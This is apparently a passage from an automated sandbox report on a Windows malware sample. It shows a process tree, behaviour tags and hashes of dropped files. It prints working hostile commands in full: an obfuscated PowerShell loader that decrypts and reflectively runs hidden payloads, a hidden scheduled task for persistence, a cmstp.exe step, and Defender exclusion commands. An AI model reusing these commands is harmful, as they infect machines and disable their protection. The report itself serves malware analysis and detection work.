 U Z 3 O v 1 d f C a l 7 d m 0 J w P c V X 3 b G E N W r V S r U Q O R A y 0 X d 2 W H H / e H Z 1 r M G f Y Q a + y c w T 5 2 R 2 g U 7 6 p M 4 n U 0 7 K F c 6 h N x 0 V b L 8 F 1 M V l x l D a O i / e e L Y 3 8 S 8 d + k u 2 J Y C / 9 M M M o U K p M 1 I F C h M s P r 9 I b P V D M K 5 B A 0 / H v 7 d G p 8 P l q B X 9 o R j M p O X D F D K 9 + o y i 7 N 1 W e J X M Y Z w R c F x m S Z F h u E o F y x K q I 3 h f + 8 d Y 0 K Z A q C q / j J Y C W M S j G Z Q I h J r 9 r a D E i L t l r T h W 0 o a 2 q A m / s x q l s o C i j e A 2 x S N k d j D t O D 9 2 4 n M B N 4 M P U W 0 J V / y k a z s F m t e j A A 3 Z l B k O 4 t N p J D k h p 0 0 u E D 1 C / V s g a 9 q j K P U d N l y y j A B N X P W t 2 O R g 5 Z M T T M 6 M S m 2 O V b N / Z y T N a o c F Z X C Q h 5 y Z z q n x K O v u e g M f l Z t Z 0 n C V N L Q a h q k C 7 S p k 7 Z v o i m K H d T t y v P l d X + U K 2 1 q 8 b l I b 6 O e b o J 1 k P 1 h E M Z D 5 9 b e s H 3 y b T E i n 9 q 6 1 O V 4 1 / x d M 9 Q k d a 2 f n e B c B D 5 A 1 s V h v M K t Y N n h G j q u o n F Q q x p R q R g 2 a H X M R y w o 3 1 M s l Z Z R H A v 0 D r c w d D r f 8 C 6 X D H 1 P w Z U S G 7 I 2 S r q A k S E O J O e I T e 4 X J 9 p g Q q C t x C 2 d e D j u I Z 9 1 Q d m d h 3 + V J 3 y + U 2 u I 8 K O 8 0 X K 2 Q X x k m H H o F u k 4 3 o t S H G J X C 5 Z g Z v r 9 y c + b E j V O w W G J G R C b i o E l 3 w z 8 b S 8 B L k v G i 5 g G f m L 9 l w z R I L W Y O m 5 u G W t 6 I z + g w 1 + R P e 6 I m x U d w g B g T h K d N 2 Y F L R a k r P 7 t D c 5 5 S l E y d V 0 o Z A P X 1 t m p v y B 6 4 w O n 7 0 J E 4 b I A n 3 N n X g U W B Z R K c 6 l r p x Y L 2 7 y i o F / O f 1 H H P t y r V B 4 / r f u / R 3 R 2 r f D / T M o + F w X h X S G j y L n 7 + q W t Z g C I x Q H Y o b e R C r C A U g x q f I e z O H I 8 a x J s R m t J + f 2 2 q 1 O b j o V l C o O 7 H f K M v p i 0 Z C o s d 5 m X + u h l F f C J S / d V y N 8 k K + F 1 p 2 s G p B 3 Z k B b t l X 7 n y I g B Z X 6 D F r f L Q 8 S 5 8 M g Z k Z S 4 b 0 1 8 E 4 g 9 C y r C U o b 3 a u B L o A y v 4 t D Y O k 8 g k K z U f 4 t u m E q r p Y x 4 l O b u z u 2 D A 8 A o / p C W + 6 Q Z a h b n S C b 4 a 0 W U n b I M U e J d J I x 5 W 8 t + M T t H u u H i R k 8 b o C A O m 5 v W k N u l x q / / d T f R P g F E U P x 5 F h z J M s u c b a L 5 + T t d l N q X d + W 2 l d P 1 5 o + 8 e 4 9 O u 0 K 9 m G Z t W a 7 H 0 q x D l 2 d C d O 8 E A S M H K D A U g 7 9 G M m 3 + c W + v N Q z B C w 4 0 4 Z P 6 y 7 6 c G l 4 k N r G y i k P 7 a " )  
         $ i   =   $ d [ 0 . . 1 5 ]  
         $ e   =   $ d [ 1 6 . . ( $ d . L e n g t h   -   1 ) ]  
         $ a e s   =   N e w - O b j e c t   S y s t e m . S e c u r i t y . C r y p t o g r a p h y . A e s M a n a g e d  
         $ a e s . M o d e   =   [ S y s t e m . S e c u r i t y . C r y p t o g r a p h y . C i p h e r M o d e ] : : C B C  
         $ a e s . K e y   =   $ a  
         $ a e s . I V   =   $ i  
         $ d e c   =   $ a e s . C r e a t e D e c r y p t o r ( )  
         $ o u t   =   $ d e c . T r a n s f o r m F i n a l B l o c k ( $ e ,   0 ,   $ e . L e n g t h )  
         $ r e s   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( $ o u t )  
         I n v o k e - E x p r e s s i o n   $ r e s  
  -inputFormat xml -outputFormat text
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5320
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pyrphdsg\pyrphdsg.cmdline"
                                  5⤵
                                    PID:5512
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFEB3.tmp" "c:\Users\Admin\AppData\Local\Temp\pyrphdsg\CSC59BD8EB9C90E4BC8984DA165F31229A8.TMP"
                                      6⤵
                                        PID:5552
                                    • C:\windows\system32\cmstp.exe
                                      "C:\windows\system32\cmstp.exe" /au C:\windows\temp\3l1zov0y.inf
                                      5⤵
                                        PID:5604
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
                                    3⤵
                                      PID:5312
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVzb+ZnULdRKJ8Pt1u0INEzxzJ9SAW0T4lv8svV35z4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1TJD7feNK15qiqdG0L0ERw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FnHYa=New-Object System.IO.MemoryStream(,$param_var); $tuGjJ=New-Object System.IO.MemoryStream; $ZPygJ=New-Object System.IO.Compression.GZipStream($FnHYa, [IO.Compression.CompressionMode]::Decompress); $ZPygJ.CopyTo($tuGjJ); $ZPygJ.Dispose(); $FnHYa.Dispose(); $tuGjJ.Dispose(); $tuGjJ.ToArray();}function execute_function($param_var,$param2_var){ $PWDPu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rNYVG=$PWDPu.EntryPoint; $rNYVG.Invoke($null, $param2_var);}$mhqzu = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $mhqzu;$nhfYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($mhqzu).Split([Environment]::NewLine);foreach ($JOXWc in $nhfYw) { if ($JOXWc.StartsWith('gVggYAWWcClzlgdUqYRt')) { $eTtfZ=$JOXWc.Substring(20); break; }}$payloads_var=[string[]]$eTtfZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                        4⤵
                                          PID:5832
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                          4⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Modifies registry class
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5824
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_644_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_644.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                            5⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:772
                                          • C:\Windows\System32\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_644.vbs"
                                            5⤵
                                            • Checks computer location settings
                                            PID:5444
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_644.bat" "
                                              6⤵
                                                PID:5132
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVzb+ZnULdRKJ8Pt1u0INEzxzJ9SAW0T4lv8svV35z4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1TJD7feNK15qiqdG0L0ERw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FnHYa=New-Object System.IO.MemoryStream(,$param_var); $tuGjJ=New-Object System.IO.MemoryStream; $ZPygJ=New-Object System.IO.Compression.GZipStream($FnHYa, [IO.Compression.CompressionMode]::Decompress); $ZPygJ.CopyTo($tuGjJ); $ZPygJ.Dispose(); $FnHYa.Dispose(); $tuGjJ.Dispose(); $tuGjJ.ToArray();}function execute_function($param_var,$param2_var){ $PWDPu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rNYVG=$PWDPu.EntryPoint; $rNYVG.Invoke($null, $param2_var);}$mhqzu = 'C:\Users\Admin\AppData\Roaming\Windows_Log_644.bat';$host.UI.RawUI.WindowTitle = $mhqzu;$nhfYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($mhqzu).Split([Environment]::NewLine);foreach ($JOXWc in $nhfYw) { if ($JOXWc.StartsWith('gVggYAWWcClzlgdUqYRt')) { $eTtfZ=$JOXWc.Substring(20); break; }}$payloads_var=[string[]]$eTtfZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                  7⤵
                                                    PID:2912
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                    7⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:244
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1
                                          2⤵
                                            PID:5776
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
                                            2⤵
                                              PID:5784
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
                                              2⤵
                                                PID:6100
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
                                                2⤵
                                                  PID:6108
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6388 /prefetch:2
                                                  2⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1328
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:320
                                                • C:\Windows\System32\CompPkgSrv.exe
                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                  1⤵
                                                    PID:2044
                                                  • C:\Windows\System32\rundll32.exe
                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                    1⤵
                                                      PID:5712
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath 'C:\'; .('Add-MpP' + 'reference') -ExclusionProcess 'powershell.exe'
                                                      1⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5936
                                                    • C:\Windows\system32\taskkill.exe
                                                      taskkill /IM cmstp.exe /F
                                                      1⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5164

                                                    Network

                                                    MITRE ATT&CK Enterprise v15

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                      SHA1

                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                      SHA256

                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                      SHA512

                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      bffcefacce25cd03f3d5c9446ddb903d

                                                      SHA1

                                                      8923f84aa86db316d2f5c122fe3874bbe26f3bab

                                                      SHA256

                                                      23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405

                                                      SHA512

                                                      761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                      Filesize

                                                      152B

                                                      MD5

                                                      d22073dea53e79d9b824f27ac5e9813e

                                                      SHA1

                                                      6d8a7281241248431a1571e6ddc55798b01fa961

                                                      SHA256

                                                      86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6

                                                      SHA512

                                                      97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                      Filesize

                                                      456B

                                                      MD5

                                                      149832d3c7cc43be68fd8d312c94b3f1

                                                      SHA1

                                                      1f5ed44bb6c09ec59cd9f9bc39eda394f3b0ad67

                                                      SHA256

                                                      9bba190d1b2904003b47d341d8561e43d8f5ad5f3db0835cd4fa194ab0e13b48

                                                      SHA512

                                                      06416a216d41a7ccf3669ef19abc642c986d012349104102cf63e72d72703e789ab2c6c4f0480c854b131a5e6589ceb5d571053ab794779fa64c2ef1677173ce

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      0b6eb138f93886cc3fd28fcc0dfb9187

                                                      SHA1

                                                      d7f7c702d20ab5e44f91d00f43e91a50715e2dbc

                                                      SHA256

                                                      e6b70272f1f19a18f236e7d82eb8864c032badd000c05b62038bc98f1eaa5d19

                                                      SHA512

                                                      138cde80a4c2913bcc308368cd00d0f7c857c4ee07a975bf6f6112043df23eb4a562f1cae2f878bd50765fe76bb6c0b7ea023bc8b39bb4f2e620dba6774cdaa8

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      ce15ca6dd5010e6e025fd047ff1e600c

                                                      SHA1

                                                      a25fe699eb22897b44872fcaa3afa03761e910b3

                                                      SHA256

                                                      e0445aa30b9f5dc87b5773dfd998640a20f935b3dd38a73ddb0692746620e3fe

                                                      SHA512

                                                      602ee387761f78058bc55871f51f079ab5e4bcbafa5e306877ec2df0d0e34f57e8c079efa19ecb1a3b4d3c3e09ae59d05acfc9c06508c992a109743bc7d870f0

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                      Filesize

                                                      3KB

                                                      MD5

                                                      375cdb4f22b98cd1d6411ca5ed2b0364

                                                      SHA1

                                                      fdeaefac148d47530875f65625457e4acce36524

                                                      SHA256

                                                      e2670a4c8d6d742f4a3cb136f0d821410e7951733eadce3e92b3847e3d02f63d

                                                      SHA512

                                                      22f0b28ef46eb4863ae55cbba15af0f8f1676c78141fd79ea14fcda7e9671a064f40558265e784c5b29aad30b9413ebbe2d103794321d2efc72095f1a0e38b1d

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                      Filesize

                                                      5KB

                                                      MD5

                                                      e20320e37f4ddf177f0829b5bf8aae50

                                                      SHA1

                                                      3d1dbb0dbe87630f2a0f6116f2ee99e835018e85

                                                      SHA256

                                                      01e6df56f773480894cf5622c25a704724b060ed5a50d4b34492ab684614e33f

                                                      SHA512

                                                      531a336596730f27e5e31b175e9e5ae63458d05fcc381558d123b5dc40a1574b0e74192d4b2b8c07f1aafbcb72663c59c41f9488e516a6842af4b0cb0bbd5bca

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                      Filesize

                                                      6KB

                                                      MD5

                                                      7c8c1e7d0c2d281bbcd73e0dda611ae8

                                                      SHA1

                                                      acf7a855fb867b9c9abf779e4f06c01c2109c0b1

                                                      SHA256

                                                      e67383482d7b427ee64cb8b968c839c2274fedc82f98b88164bf9d85ccfa23d1

                                                      SHA512

                                                      713c981ba42143a348dd5dac768b48ffbf1fec915c016a09ec0a4e3f34aad66eeff33af21596b276c271c1cf3b2d2b6377c610223340ab5d910bbcc766d5e689

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                      Filesize

                                                      16B

                                                      MD5

                                                      6752a1d65b201c13b62ea44016eb221f

                                                      SHA1

                                                      58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                      SHA256

                                                      0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                      SHA512

                                                      9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                      Filesize

                                                      10KB

                                                      MD5

                                                      03c04c38639a8da564dc39bd0be4f087

                                                      SHA1

                                                      d2bee6820bc6a08c9f86a656eea3e7f68bd80b76

                                                      SHA256

                                                      63106251167bce083ee2e8a4af0c8925622d2bb370544528dec2cffc944ed0c9

                                                      SHA512

                                                      5e31459cf8342844961e6d847144cbae1d7b9ecbdd5e4a09bedadcf9dafe4829131d009cfef746f5142fdf2ee63843eb099e8733f1f0af10e4a7c540d1cb06b0

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\baec12cb-6f19-47a0-a235-38a42719a478.tmp

                                                      Filesize

                                                      10KB

                                                      MD5

                                                      d52d5c48f0f689fad6feab7291d86674

                                                      SHA1

                                                      a65005be0077c7214d5c221905fc85d3a910660b

                                                      SHA256

                                                      46ea864fa28a3f3fecda2fc3da3f4b413bd678850a5e5054cbe52292aa80ae8a

                                                      SHA512

                                                      9ef9471f90d71e81163b4e708a889fb1dfb6ee84b19c2064203870aab2eef78bc2048a7a467805ee119d5d3e61f301349a646594834a22a2b51cc2f9e2433b9b

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      005bc2ef5a9d890fb2297be6a36f01c2

                                                      SHA1

                                                      0c52adee1316c54b0bfdc510c0963196e7ebb430

                                                      SHA256

                                                      342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

                                                      SHA512

                                                      f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      4abdf5877984973df7031e02dcdaa957

                                                      SHA1

                                                      600bf4203f4cd3201b0595c9bd499d93ea9ebfc4

                                                      SHA256

                                                      098b34ddc05f4a72404180784dad7fda1f2ed00d408bb76f7fa2ac924efd1cbe

                                                      SHA512

                                                      f55b463a89a5b57e68b29c7c343b305fd2221bc07a004a5a85404fe4a5d979c657afcafb8fbfaf477ed434a5703014bc7ca3928794f8bc60e243744dee54265d

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      43f4bec966ab901ac034fc136a642fa5

                                                      SHA1

                                                      8e7227cefec8b05c9a79b2751d1261187b9c0422

                                                      SHA256

                                                      09ea65cf68920d08638db30c86eb3c90254b9b2d9f73246bc0176c86ce687ae4

                                                      SHA512

                                                      a65a2fe6acf4cb0dae8361af3e42e35c6bfaa93859e744a7779630d785a56bb030161c92a74b88a223769fdb912911146a762cf6a8afe33642e2695ea08ceec0

                                                    • C:\Users\Admin\AppData\Local\Temp\RESFEB3.tmp

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      326d0056022fd381257eb469b31d3887

                                                      SHA1

                                                      e91cff5fcc13bcbcd86633c854747d6d497c49eb

                                                      SHA256

                                                      748141358530e3f5fa1e6acded74c74cf285054f119b1de01f8749103655f1b7

                                                      SHA512

                                                      bd94533d7e7adcd8b2852afbc667abc337cae3730aebe2005d600582dd429053ee300980e1dfaa7a15b06e09752cf319bd7cb1b9e23211eafc247bc841e25557

                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pi1leurs.ivi.ps1

                                                      Filesize

                                                      60B

                                                      MD5

                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                      SHA1

                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                      SHA256

                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                      SHA512

                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                    • C:\Users\Admin\AppData\Local\Temp\pyrphdsg\pyrphdsg.dll

                                                      Filesize

                                                      4KB

                                                      MD5

                                                      a6a1179541a3e63c74ace459838d475e

                                                      SHA1

                                                      336f077c3c12e3c9a647b0d11df770d382097651

                                                      SHA256

                                                      91ba79da4819a3702423d0b292ecf402cbe06961fac5cdef9c553cf8608649e3

                                                      SHA512

                                                      eed524e62529939f84edb1b2486bd715f7991ead79bab974f6fd806ea8070f1f8df491a93ca41d549ed8d9ad14f5d85647cfb35df20b31042aaa37fc296e8147

                                                    • C:\Users\Admin\AppData\Local\Temp\system.bat

                                                      Filesize

                                                      70KB

                                                      MD5

                                                      b5d7889efc929af61649d13f17bf26ad

                                                      SHA1

                                                      44b1bb834ad5b3566dd4c758995bbedb2c2ba6b6

                                                      SHA256

                                                      3490b5a8d583c702b69506a047fc21135758b8dde44d77b9d102c3e4d4a4de01

                                                      SHA512

                                                      193db0b92d1595c8cfd3ecb31dd8cc2a23e3701319418a1b465bf0bc87c2708aedcd49b099bd6fe202bcca7a24f3df9bb792280abe95dce535e32f2f7ade4c3b

                                                    • C:\Users\Admin\AppData\Roaming\Windows_Log_644.vbs

                                                      Filesize

                                                      115B

                                                      MD5

                                                      4776bd4988b4a5f9040a8ef6422f53b5

                                                      SHA1

                                                      e19fd726fd5a89300df405a81c5ca383c53875db

                                                      SHA256

                                                      b7e96a575fcedd93babeaf09e41c69dc8f4436132b74e6348af67fde70ad70ea

                                                      SHA512

                                                      38b9aa5af6826e6edb8f48fc9ffc0c4b2199c673c7ee6de89a21eed007b126275cfc91678af67377e7e48bcdfb9d3634d7ff4a914af4f0b47cc906c2837e2f80

                                                    • C:\Users\Admin\Downloads\Unconfirmed 81620.crdownload

                                                      Filesize

                                                      78KB

                                                      MD5

                                                      870907ad00a8f53e022f042c92727d34

                                                      SHA1

                                                      8789f00e533da9b0a8bd380b9264cfaefe8ff7bc

                                                      SHA256

                                                      6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff

                                                      SHA512

                                                      32fbacd4338eced63990c4e0f7327fc3fc4282d497e95724445476f42acf8c1378238d345e5ba53afe86e39d860643657523b42cc5982832162e75cd7d68cde1

                                                    • C:\windows\temp\3l1zov0y.inf

                                                      Filesize

                                                      687B

                                                      MD5

                                                      99fdcef63da22bd2d90299ebd3830493

                                                      SHA1

                                                      15c9313961d29d25938a9a1279cd484611c6f4f9

                                                      SHA256

                                                      9872a418ded853162e67f6054b17d6abdcd9f5bdac087d262a5f2604a61e797b

                                                      SHA512

                                                      fb1f13444fd6ae5b692f496481a9601de231ef542ca638c0a21653184fffe5a650c64bea35808d021ec9356808a7f0873a8e908ec2ccdbdc01a321f24e752d66

                                                    • \??\c:\Users\Admin\AppData\Local\Temp\pyrphdsg\CSC59BD8EB9C90E4BC8984DA165F31229A8.TMP

                                                      Filesize

                                                      652B

                                                      MD5

                                                      e69bc52789629b8ae5038b401acb7ab8

                                                      SHA1

                                                      66ef8afd795d5ef7a1c40102b39a6fce401f8fca

                                                      SHA256

                                                      28312fcc1a9742e89bc835fc417b84cffe2a994f3534721cbe6803433f3627b8

                                                      SHA512

                                                      6e008cd2195cf16b9642735a6022a756e129eabbbcf8a60d82617f72fcf5046b8a409d61e25b3c7be4c38d147b4af693053e6c9215efbfbb6a2d1948012059a8

                                                    • \??\c:\Users\Admin\AppData\Local\Temp\pyrphdsg\pyrphdsg.0.cs

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      da774b7c7335bf78596f22c13b46a80c

                                                      SHA1

                                                      43d248947111e2d943aa1c77df51fd5192e92797

                                                      SHA256

                                                      da5feb1c361cdfd307e18c753790933d18968da7a5de454a2fae3d9dd5e1fba8

                                                      SHA512

